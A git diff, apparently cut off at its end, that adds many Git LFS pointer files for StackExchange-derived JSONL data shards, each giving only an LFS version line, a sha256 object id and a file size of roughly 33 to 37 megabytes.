0000000000000000000000000000000000000000..8ecf0e770c574fc16256275b4e30375188fae093 --- /dev/null +++ b/data/stackexchange/1-1/137_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90380ef0301a54eefc68547df69ec6327b99171bdf3fc842f6adb0887c16fa38 +size 33769612 diff --git a/data/stackexchange/1-1/1380_2289.jsonl b/data/stackexchange/1-1/1380_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d620fb911ab2a5bc1dca16f31f7001c03974c790 --- /dev/null +++ b/data/stackexchange/1-1/1380_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bed1f345d513b9224d8663a6152f63c61cfc02f14f3db089df69b1c7d6fce413 +size 37513895 diff --git a/data/stackexchange/1-1/1381_2289.jsonl b/data/stackexchange/1-1/1381_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0f09d6fd2f3b33e1ca2f79a5ff273733195f515 --- /dev/null +++ b/data/stackexchange/1-1/1381_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0d5a72caf6dee11e18244255e2940398b4bcd4be6c8bb27e5836cac54809f456 +size 37474123 diff --git a/data/stackexchange/1-1/1382_2289.jsonl b/data/stackexchange/1-1/1382_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18e86b0f7913c62c8df14c147994478852bd9663 --- /dev/null +++ b/data/stackexchange/1-1/1382_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:a4590fb6202e180ce423ec0ec72e50bf3601460462f1112e6bd62069aa013f64 +size 37193656 diff --git a/data/stackexchange/1-1/1383_2289.jsonl b/data/stackexchange/1-1/1383_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6780469f642be70948cc619e55e965dfe9895e8 --- /dev/null +++ b/data/stackexchange/1-1/1383_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef81ba2de7f991f6b4f75ec2ca56b22384021805eb2432b4457f9014f89654b0 +size 36889906 diff --git a/data/stackexchange/1-1/1384_2289.jsonl b/data/stackexchange/1-1/1384_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b06576f549c411ec65fe3f26b5e630319c67a3d --- /dev/null +++ b/data/stackexchange/1-1/1384_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7b33688b2c6f3da252d882fca3808b2e649fa432b2ded41ddf3a52bce03893a +size 37552359 diff --git a/data/stackexchange/1-1/1385_2289.jsonl b/data/stackexchange/1-1/1385_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e834452247cfead27e53b14de94f0019a76db69 --- /dev/null +++ b/data/stackexchange/1-1/1385_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b00cbd95c3b524b44fbd6a25aee342b6fb3759645a70d3c5f45b5aced43396d +size 37125947 diff --git a/data/stackexchange/1-1/1386_2289.jsonl b/data/stackexchange/1-1/1386_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2fc9dff6888370489a7a300ce1607b2fc0c8998 --- /dev/null +++ b/data/stackexchange/1-1/1386_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f68e26a3667bb618e0c01ff54c93c78125b81bff8e297bf481c8b42c3808cef2 +size 37021526 diff --git a/data/stackexchange/1-1/1387_2289.jsonl b/data/stackexchange/1-1/1387_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..240f07fe4a51e7ceff1417c5fe46a7fdd74c7d54 --- /dev/null +++ b/data/stackexchange/1-1/1387_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df401446298e9056b1242ce457eeea8653379d57eee395c68d0be3e6b88a0f72 +size 37065342 diff --git a/data/stackexchange/1-1/1388_2289.jsonl b/data/stackexchange/1-1/1388_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af3d70ab93f96d73dee5f311ed3a599e303faf42 --- /dev/null +++ b/data/stackexchange/1-1/1388_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f380a95dd3828287db38df4d37f3e5568545cd478e60a6632f318d33041ba29 +size 37320221 diff --git a/data/stackexchange/1-1/1389_2289.jsonl b/data/stackexchange/1-1/1389_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03945469c9ccf74591b89cc10e7b65330c8d5887 --- /dev/null +++ b/data/stackexchange/1-1/1389_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80d48f676871678243461796828728c609d09c4a8ca5400bc539d87d9bbeb9d7 +size 36497831 diff --git a/data/stackexchange/1-1/138_2289.jsonl b/data/stackexchange/1-1/138_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb3ec7b6593ba6423fefda0c50d3d538bba746e0 --- /dev/null +++ b/data/stackexchange/1-1/138_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc656d743ce36776867a0253a02dca50fc67fe6e1102638cc1a5c8cc8d8f2a8d +size 34196100 diff --git a/data/stackexchange/1-1/1390_2289.jsonl b/data/stackexchange/1-1/1390_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..da0bd3547701e396091ace51b6e3f825583e6dd3 --- /dev/null +++ b/data/stackexchange/1-1/1390_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d08b3dffb3044de2d0d3a5f28b8892ea8859d9f4a575114eb63d4a5df1a4230a +size 36333620 diff --git a/data/stackexchange/1-1/1391_2289.jsonl b/data/stackexchange/1-1/1391_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5162896046f137df2cdb4c3febe02bd30285c221 --- /dev/null +++ b/data/stackexchange/1-1/1391_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f137d8e498073e3640d89965c1063503396749ebb5b70d8871f1b561c771d896 +size 36257476 diff --git a/data/stackexchange/1-1/1392_2289.jsonl b/data/stackexchange/1-1/1392_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6fcab29846ce6e28e7921c31b5c826bd8736a180 --- /dev/null +++ b/data/stackexchange/1-1/1392_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81289713296512e80d589816d2a0405762543075c56da9751d0f1307b4ee7f67 +size 35896524 diff --git a/data/stackexchange/1-1/1393_2289.jsonl b/data/stackexchange/1-1/1393_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7451d1b2daa13fbaedd366b609a579c9fab4a50b --- /dev/null +++ b/data/stackexchange/1-1/1393_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d21441964e7991740c6cb4b7710288aa36c18babcaebea58e8f68bdd048ea6ad +size 37036770 diff --git a/data/stackexchange/1-1/1394_2289.jsonl b/data/stackexchange/1-1/1394_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e31f5e28b2c080bd81f076bca84462d24153f48 --- /dev/null +++ b/data/stackexchange/1-1/1394_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f54d249515f96db833d060830254812d36680a4745477b80cf284eb6aa7e0fe +size 36738114 diff --git a/data/stackexchange/1-1/1395_2289.jsonl b/data/stackexchange/1-1/1395_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e41f1bc8b0457cc51e7a05f3d3bbb59ff37ac63 --- /dev/null +++ b/data/stackexchange/1-1/1395_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a72a91660f6250cd662ea77a7056a0274a7a7def737e098cdd6f0a3437af9c48 +size 36610736 diff --git a/data/stackexchange/1-1/1396_2289.jsonl b/data/stackexchange/1-1/1396_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2dd52d576e183f6ffb5ea5c95d017a1c52cfa61 --- /dev/null +++ b/data/stackexchange/1-1/1396_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:998defb20a62fbee5d4397fe6a25f50af044db8195f8d1fa3335edddb9a3ca02 +size 36309833 diff --git a/data/stackexchange/1-1/1397_2289.jsonl b/data/stackexchange/1-1/1397_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d987aa2f928845de0a48e0b8713df98b898e5d79 --- /dev/null +++ b/data/stackexchange/1-1/1397_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2a8bca188cdda666f4fb9742bb78af09552b096caf0777c6c85782d8747f189 +size 37214864 diff --git a/data/stackexchange/1-1/1398_2289.jsonl b/data/stackexchange/1-1/1398_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7085c10ba7f09b6bc718334b97e8259df227fd8 --- /dev/null +++ b/data/stackexchange/1-1/1398_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:51be511bd73b9096e96a7b3a22ac53224a7d081efa367201e6ae78cd961beee4 +size 36666661 diff --git a/data/stackexchange/1-1/1399_2289.jsonl b/data/stackexchange/1-1/1399_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bc1fd62ff09267897500a9aa0cf96077e8ce379 --- /dev/null +++ b/data/stackexchange/1-1/1399_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8d34827baf022c7e63bf8bf35927f384ed339cda6060aee1cbd63839a986cab +size 36755548 diff --git a/data/stackexchange/1-1/139_2289.jsonl b/data/stackexchange/1-1/139_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96f9674ffb987cd9d914ee6449d8f732ebf2bf14 --- /dev/null +++ b/data/stackexchange/1-1/139_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:633c01d571a40fcc4b0688e9ed2e061adaae886e7823e2d69fc381ed913de7b4 +size 33522414 diff --git a/data/stackexchange/1-1/13_2289.jsonl b/data/stackexchange/1-1/13_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8994544564127301b6867b6b4dcfa80aff659c61 --- /dev/null +++ b/data/stackexchange/1-1/13_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c36f8109e10c67f82160505965ffeea7844088a2926f1a9556604ee43ec67e13 +size 35986610 diff --git a/data/stackexchange/1-1/1400_2289.jsonl b/data/stackexchange/1-1/1400_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..985bc5fb178e99636a3c5a9664dd74de451e02b9 --- /dev/null +++ b/data/stackexchange/1-1/1400_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e795fe0786655d611aed16ed03ef763aad2d1b9bdaced6593709caec8c40b69 +size 36749251 diff --git a/data/stackexchange/1-1/1401_2289.jsonl b/data/stackexchange/1-1/1401_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..534250b4adc457655889559aecb20f0841625a13 --- /dev/null +++ b/data/stackexchange/1-1/1401_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b35395ae358e61772ed8b9922021639d347b37199305fca11fb661a309f1495 +size 36703111 diff --git a/data/stackexchange/1-1/1402_2289.jsonl b/data/stackexchange/1-1/1402_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5de72f1862f13184cd26130d6099477d2c8d8554 --- /dev/null +++ b/data/stackexchange/1-1/1402_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:085bafc961a5ae26e12181cb2523af8fe7b04ee38843a54024b6ebad37458975 +size 36195975 diff --git a/data/stackexchange/1-1/1403_2289.jsonl b/data/stackexchange/1-1/1403_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49dc05e1bf7447172125f18c38b8ab09653944bb --- /dev/null +++ b/data/stackexchange/1-1/1403_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:43bf76b0b8c1941cd672c366bf74593875f0032b8ced41fbb222144183c088d0 +size 37223362 diff --git a/data/stackexchange/1-1/1404_2289.jsonl b/data/stackexchange/1-1/1404_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..79e33ec9d6087045b7f24f8a4a5d232e79a71ece --- /dev/null +++ b/data/stackexchange/1-1/1404_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e0f43e3c4b1d4b4d2339762779e77eaceac38d2d593a10a4481de74799fe419 +size 36197058 diff --git a/data/stackexchange/1-1/1405_2289.jsonl b/data/stackexchange/1-1/1405_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..4e3e114434570c0998d54ec70bc1cefb87aa7347 --- /dev/null +++ b/data/stackexchange/1-1/1405_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:169748d36ab7355de2317cdb51a8130ba400065b0ad8a65552ff5c5957799c2c +size 36174206 diff --git a/data/stackexchange/1-1/1406_2289.jsonl b/data/stackexchange/1-1/1406_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78a94df2f516d6d0a1aa026f4966cc9b5a4aa1cb --- /dev/null +++ b/data/stackexchange/1-1/1406_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f46dd848cf6c96cf4e9fc2c1c9d3cc23afaf9e869b80b2248c6fb20b34e1362 +size 36734647 diff --git a/data/stackexchange/1-1/1407_2289.jsonl b/data/stackexchange/1-1/1407_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d08b7b7a1e5eedeeae14f6dc50e2fad0f29a582 --- /dev/null +++ b/data/stackexchange/1-1/1407_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd2d3290610ed095778c25101733b72f88ef8272a7213322d9429f227489015d +size 36461417 diff --git a/data/stackexchange/1-1/1408_2289.jsonl b/data/stackexchange/1-1/1408_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8846e1bbf4c1509e0e8e511ecb61dedaa02193d --- /dev/null +++ b/data/stackexchange/1-1/1408_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0eae122464b5a6ba0d3ed909c08b717695d40614af3c78d0bac84221105013de +size 37441449 diff --git a/data/stackexchange/1-1/1409_2289.jsonl b/data/stackexchange/1-1/1409_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1948a8ec8730e23db8f21e8decc9201a0f6b05cf --- /dev/null +++ b/data/stackexchange/1-1/1409_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a647c2f9c782a3759d8b58a8b42999ed17ac9fbf68f11e9b7b9f0ba0539fcaa +size 36762831 diff --git a/data/stackexchange/1-1/140_2289.jsonl b/data/stackexchange/1-1/140_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e94c8aec63ee7c1e061d72ed38c3363d4aded51e --- /dev/null +++ b/data/stackexchange/1-1/140_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea6b1e71648e05cf0091e5c05b7c5353c8a26244777a7a6bdcbc4a0cbd63e337 +size 33764071 diff --git a/data/stackexchange/1-1/1410_2289.jsonl b/data/stackexchange/1-1/1410_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02e0dabcbae60b0cac99e3bf4c5ea5b6513c7739 --- /dev/null +++ b/data/stackexchange/1-1/1410_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:024d505b74e053b2f2c51ca60bddc1a17ed321dd087ba465758b779311885760 +size 36903720 diff --git a/data/stackexchange/1-1/1411_2289.jsonl b/data/stackexchange/1-1/1411_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..811e90ad2ea1b00e270187e8ad1a951cf7fe2a92 --- /dev/null +++ b/data/stackexchange/1-1/1411_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13a4f9100b7fd1d866874d7f4b07cdcfb78835f183894a76712f2c0c221f4bb5 +size 36509095 diff --git a/data/stackexchange/1-1/1412_2289.jsonl b/data/stackexchange/1-1/1412_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d788001b23fb7dddad812d4cff1ac15a34416685 --- /dev/null +++ b/data/stackexchange/1-1/1412_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:a10fba9e609c8c7f1f180fc9f2770958701216fc8bd2241311afadafdbbe4a70 +size 37081287 diff --git a/data/stackexchange/1-1/1413_2289.jsonl b/data/stackexchange/1-1/1413_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d38cfea0b351931cf81cf4c0af835059563fffa2 --- /dev/null +++ b/data/stackexchange/1-1/1413_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adc6e24e821aa4d9e25722c78f9678ed843f3284bb5d2ce0802b1dcd7c86ce18 +size 37307804 diff --git a/data/stackexchange/1-1/1414_2289.jsonl b/data/stackexchange/1-1/1414_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51eb525e42421c6192d1ab0fc89cba0698da025d --- /dev/null +++ b/data/stackexchange/1-1/1414_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7bf1729965b83801b487c898c8acf27de3a08f259b4465cf5d123d045480bf14 +size 36467591 diff --git a/data/stackexchange/1-1/1415_2289.jsonl b/data/stackexchange/1-1/1415_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..027c8abad852bcb794181461958ec79d868fcdf6 --- /dev/null +++ b/data/stackexchange/1-1/1415_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e3415e6e077f94f4bb39122fecc501fe75a3b2a310d6d36bd711e9612a45217 +size 35743506 diff --git a/data/stackexchange/1-1/1416_2289.jsonl b/data/stackexchange/1-1/1416_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..efdeb4bc2d6ef67bf63fe0c1c90ae2d813514f8a --- /dev/null +++ b/data/stackexchange/1-1/1416_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:856d7f102b16a1791d31a0d3b475a1ac9385bd6566bc2ac4bfaf57c525918440 +size 36897238 diff --git a/data/stackexchange/1-1/1417_2289.jsonl b/data/stackexchange/1-1/1417_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45b730872c75b449dbc3be0164fc628b22c18cd5 --- /dev/null +++ b/data/stackexchange/1-1/1417_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0714d4469e8ea67dc561436b88e2eafa465e301e8273963461db0dbc0750f416 +size 36701116 diff --git a/data/stackexchange/1-1/1418_2289.jsonl b/data/stackexchange/1-1/1418_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b98b6fdef65344b30a70d1e148f339d1cd6c4bb --- /dev/null +++ b/data/stackexchange/1-1/1418_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46f524f843dd4917387328eb26b3f061b8640e446b741aa7f99034c6ac7dafc2 +size 36714597 diff --git a/data/stackexchange/1-1/1419_2289.jsonl b/data/stackexchange/1-1/1419_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1c08b1f6c03bd977fb3469e4081c3c1f4bf28d4 --- /dev/null +++ b/data/stackexchange/1-1/1419_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3965c4159e3bd26dc1bdb84081d20a4d0c73100b20eef8a0bf1647971885b3db +size 36678238 diff --git a/data/stackexchange/1-1/141_2289.jsonl b/data/stackexchange/1-1/141_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5957ef9c2b8baae6b4650c614344f27fae5a19b0 --- /dev/null +++ b/data/stackexchange/1-1/141_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:666b4435154b863d3ade98fc6105c384de8f0a24c39e5418f4a19a970927681c +size 33975966 diff --git a/data/stackexchange/1-1/1420_2289.jsonl b/data/stackexchange/1-1/1420_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..4652a22a9add28381dd43994a201252f204f4a93 --- /dev/null +++ b/data/stackexchange/1-1/1420_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:36ddf152ef6ff694b486719d60ccab8732045e086264eaf716d597aa92ddacce +size 36311566 diff --git a/data/stackexchange/1-1/1421_2289.jsonl b/data/stackexchange/1-1/1421_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dafa7e9b870aa2d5ff498f4c2269d5a2b8a8e6be --- /dev/null +++ b/data/stackexchange/1-1/1421_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e3c1d9b7e8e12b85094c0cde6b8ec39463fef7a51496b03f0bbaefdfdbc892d +size 36632041 diff --git a/data/stackexchange/1-1/1422_2289.jsonl b/data/stackexchange/1-1/1422_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1627db87cbbda33b5e47ca0130ccb0cebc65aa7f --- /dev/null +++ b/data/stackexchange/1-1/1422_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09b67bf234a6351c065a48ed99a54315ead2689a5d4fbd2c734e5084d555d7ad +size 37071339 diff --git a/data/stackexchange/1-1/1423_2289.jsonl b/data/stackexchange/1-1/1423_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8a06f914f5f1f270e15040df164715da8e0e789 --- /dev/null +++ b/data/stackexchange/1-1/1423_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d90bd60f1173f786ae6b3eb3ce3ce482d57f07333d187502daa138f5e2f07a59 +size 37212914 diff --git a/data/stackexchange/1-1/1424_2289.jsonl b/data/stackexchange/1-1/1424_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9730d89d4546d0d8fdf15f983cde14d01d08427 --- /dev/null +++ b/data/stackexchange/1-1/1424_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32dbe04f04cd035c8e139eda47353e7042d32f6848b26ed34006ab399a6e2ca9 +size 36812814 diff --git a/data/stackexchange/1-1/1425_2289.jsonl b/data/stackexchange/1-1/1425_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97178410dd4e3b04832eb716133da34fed84c76f --- /dev/null +++ b/data/stackexchange/1-1/1425_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d0f1de9b053779afb53bc8bd1a18d6c73f384697b3cf50952ecd8126769b21 +size 36882964 diff --git a/data/stackexchange/1-1/1426_2289.jsonl b/data/stackexchange/1-1/1426_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..136a96eddfae0a1d7ae7d533030e67c27ba1d0a4 --- /dev/null +++ b/data/stackexchange/1-1/1426_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c97b34a4236f8a28dcfb4022b3f279cc101a37f01945ca6a179ad62faf7e349 +size 36142916 diff --git a/data/stackexchange/1-1/1427_2289.jsonl b/data/stackexchange/1-1/1427_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..964b2cc4dce0d65a5d4b34dfe123f99358284604 --- /dev/null +++ b/data/stackexchange/1-1/1427_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0db3a2641cf08bb1bd76c80da5b5a6f4b0a40cd7b8559ea14516a0974e410f2 +size 37365035 diff --git a/data/stackexchange/1-1/1428_2289.jsonl b/data/stackexchange/1-1/1428_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f52e3f32660f37f039d2437203bc9d30a1e640fd --- /dev/null +++ b/data/stackexchange/1-1/1428_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:4720f2a1c2404503a76efd4b658d6643b26a2adea81f040953dbf8f8b9495316 +size 36542530 diff --git a/data/stackexchange/1-1/1429_2289.jsonl b/data/stackexchange/1-1/1429_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a58e975357f793ac35e91c9744f554cc8a02bc2 --- /dev/null +++ b/data/stackexchange/1-1/1429_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:461dc67c85c5703d0ccc8cd26e1e2e7484b9e15828691feed2fb5a6da822f4fb +size 36392917 diff --git a/data/stackexchange/1-1/142_2289.jsonl b/data/stackexchange/1-1/142_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c263b7d972d3df274b27e487074d9ae12e7f26bf --- /dev/null +++ b/data/stackexchange/1-1/142_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0be9c7e29cb33951332c148d9e49cacc60e58938fea0c23d209f19078d1a5c3 +size 33579137 diff --git a/data/stackexchange/1-1/1430_2289.jsonl b/data/stackexchange/1-1/1430_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2502f298e1cf6b8a68e3177140e0f06d5e45fd81 --- /dev/null +++ b/data/stackexchange/1-1/1430_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:003710490d7cb5e86e7f5e9fa983c9d2a689073d965f4c92fb97c3fc7f79911b +size 37195336 diff --git a/data/stackexchange/1-1/1431_2289.jsonl b/data/stackexchange/1-1/1431_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8e20bc229433b9c7cc05b79d6570e4ba555ff7a --- /dev/null +++ b/data/stackexchange/1-1/1431_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94f1272245daae25f3ec02ffad5ccafef24a274827884a9ce69c16d6787388c6 +size 37826399 diff --git a/data/stackexchange/1-1/1432_2289.jsonl b/data/stackexchange/1-1/1432_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83a59b4151875e320ab117f4998e7b763839e4e2 --- /dev/null +++ b/data/stackexchange/1-1/1432_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5f528b9e50e3268a457a5ffa6b7e5f62ba63d01b699638b6beb39d31aba31a4 +size 36556645 diff --git a/data/stackexchange/1-1/1433_2289.jsonl b/data/stackexchange/1-1/1433_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..003d1fbe810dbabe3cfb1e1e8f36d169e3b5a5e2 --- /dev/null +++ b/data/stackexchange/1-1/1433_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec15906409f6f4d4669555a3cb76575fa785d34ead8ee74fe844a09dece6f882 +size 36460229 diff --git a/data/stackexchange/1-1/1434_2289.jsonl b/data/stackexchange/1-1/1434_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99e39b5f9bf61c9146426396abc6e755c6bfe182 --- /dev/null +++ b/data/stackexchange/1-1/1434_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90fc83944a9eea1d6cf11e7b3b077a06c5338acec4b63b6ae9bf37c237e864e8 +size 36381520 diff --git a/data/stackexchange/1-1/1435_2289.jsonl b/data/stackexchange/1-1/1435_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b0e6835826de1dd06a299f4e1b7906d52bba94b --- /dev/null +++ b/data/stackexchange/1-1/1435_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63d650cc76669f2a10da57b6bd31e7f1ef89b4363f6bf2baf3abf4e6b0c7a55c +size 36338101 diff --git a/data/stackexchange/1-1/1436_2289.jsonl b/data/stackexchange/1-1/1436_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..60a8648e09198a00e6aedf825945e439884e4911 --- /dev/null +++ b/data/stackexchange/1-1/1436_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5542d05d8c83057b52044e8e0d0dfa7f2c40396bcdffe2a08165403451e1d688 +size 36660004 diff --git a/data/stackexchange/1-1/1437_2289.jsonl b/data/stackexchange/1-1/1437_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70999e86ea2de8b0c8d91fd8d75aab0305bb4f55 --- /dev/null +++ b/data/stackexchange/1-1/1437_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f8260989684bd47ac246542f2cdc75bb118abaaa1e1ee50638e12847dd77ba6 +size 36819659 diff --git a/data/stackexchange/1-1/1438_2289.jsonl b/data/stackexchange/1-1/1438_2289.jsonl new file mode 100644 index 